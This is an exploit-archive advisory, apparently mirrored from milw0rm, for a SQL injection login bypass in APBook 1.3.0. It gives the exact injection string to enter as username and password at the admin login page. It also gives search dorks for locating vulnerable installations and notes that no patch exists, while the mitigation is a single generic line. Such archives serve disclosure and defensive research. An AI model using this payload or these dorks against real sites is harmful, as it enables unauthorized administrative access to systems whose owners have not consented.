Vendor: APBook
By: n3w7u
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: APBook
Affected Version From: 1.3.0
Affected Version To: 1.3.0
Patch Exists: No
Related CWE: N/A
CPE: a:anotherphpbook:apbook:1.3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

An attacker can bypass authentication on the login page of APBook 1.3.0 by entering 'or 1=1/* as both the username and the password. This logs the attacker in as admin.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.

Exploit-DB raw data:

########################################################################

                APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

########################################################################
#                            AUTHOR: n3w7u
#
## Download: www.clanscripte.net/main.php?content=download&do=dl&dlid=81
#
## Dorks:                 inurl:apbook/index.php
#  or
#         AnotherPHPBook (APB) v.1.3.0 © 2001 by Stephan Baumeister (zap)
#########################################################################
#
## Exploit:
# 
#  http://[host]/[path]/admin/index.php
#
#    [!]
#           Put as username and password: 'or 1=1/*
#           You will log in as admin
#
#

# milw0rm.com [2009-07-21]